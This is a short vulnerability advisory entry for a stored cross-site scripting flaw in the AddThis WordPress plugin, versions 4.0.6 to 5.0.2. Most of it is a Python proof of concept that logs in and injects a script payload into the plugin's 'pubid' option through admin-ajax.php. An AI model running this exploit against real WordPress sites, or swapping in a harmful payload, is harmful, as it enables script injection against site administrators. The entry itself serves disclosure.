Smart Website Tools by AddThis 4.0.6-5.0.2 - Stored XSS

2015-06-10T00:00:00
ID WPEX-ID:8038
Type wpexploit
Reporter James Hooker
Modified 2019-10-21T00:00:00

Description

WordPress Vulnerability - Smart Website Tools by AddThis 4.0.6-5.0.2 - Stored XSS

                                        
                                            When executed, the following PoC will override the ‘pubid’ option with a malicious payload, which will allow execution of arbitrary JavaScript if a user visits the options page for the plugin (wp-admin/options-general.php?page=addthis_social_widget).

import requests
s = requests.session()
target = 'http://localhost'

url = '%s/wp-login.php'%target
payload = {
        "log":"test",
        "pwd":"test",
        "wp-submit":"Log+In"
}
r = s.post(url, data=payload)

url = '%s/wp-admin/admin-ajax.php'%target
payload = {
        "action":"at_async_loading",
        "async_loading":1,
        "pubid":"'><script>alert(1)</script '"
}
r = s.post(url, data=payload)